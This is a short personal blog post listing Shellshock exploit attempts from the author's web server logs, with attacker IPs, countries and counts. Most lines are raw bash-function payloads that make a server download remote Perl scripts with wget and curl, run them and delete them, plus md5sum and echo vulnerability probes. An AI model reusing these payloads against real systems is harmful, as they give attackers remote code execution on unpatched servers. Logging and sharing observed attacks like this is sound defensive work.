Bely bashing

belyAnother week (my blog)

who count what
82.165.44.111
 / pt
 10  “() { :;};/usr/bin/perl -e ‘print \”Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\”;system(\”wget
http://www.freistilreisen.de /jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg http://www.freistilreisen.de /jack.jpg;perl
/tmp/jack.jpg;rm -rf /tmp/jack.jpg*\”);'”
 94.102.63.155 / nl  3  “GET /cgi-bin-sdb/printenv
HTTP/1.0” 403 537 “-” “() { :;}; /usr/bin/wget http:// 94.102.63.155/res.html -O /dev/null;
/usr/bin/curl http:// 94.102.63.155/res.html”
208.85.3.130 / tr  16 GET //cgi-bin/test.cgi
“() { :;};echo; /bin/bash -c \” echo 2014 | md5sum\””
GET //cgi-mod/index.cgi
“() { :;};echo; /bin/bash -c \” echo 2014 | md5sum\””
“GET //cgi-mod/index.cgi
HTTP/1.1” 403 534 “-” “() { :;};echo; /bin/bash -c \” echo 2014 | md5sum\””
“GET //cgi-sys/defaultwebpage.cgi
“() { :;};echo; /bin/bash -c \” echo 2014 | md5sum\””
“GET //cgi-sys/entropysearch.cgi
“() { :;};echo; /bin/bash -c \” echo 2014 | md5sum\””
“GET //cgi-sys/defaultwebpage.cgi
“() { :;};echo; /bin/bash -c \” echo 2014 | md5sum\””
“GET //cgi-sys/entropysearch.cgi
“() { :;};echo; /bin/bash -c \” echo 2014 | md5sum\””
 2.9.231.226 / fr 1  “GET /cgi-bin/bts.cgi
“() { :;}; /bin/bash -c \”cd /tmp;wget http:// 100.42.30.34/lex; curl -O http:// 100.42.30.34/lex ; perl lex ;rm -rf lex\””
 72.9.231.226 / us AYK Solutions  2  “GET /cgi-bin/bts.cgi
“() { :;}; /bin/bash -c \”cd /tmp;wget http:// 100.42.30.34/lex; curl -O http:// 100.42.30.34/lex ; perl lex ;rm -rf lex\””
72.9.231.226 / us AYK Solutions 5  “GET /cgi-bin/ems.cgi
“() { :;}; /bin/bash -c \”cd /var/tmp;wget http:// 100.42.30.34/lex
; curl -O http:// 100.42.30.34/lex ; perl lex ;rm -rf lex\””
 213.180.72.16  / se   35  “GET /cgi-bin/d3test.cgi
“() { :;}; echo ‘H0m3l4b1t: YES'”
count  25

100.42.30.34 is forked.net the German site is in Germany  72.9.224.0/19 is an example netblock

by golly but...

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s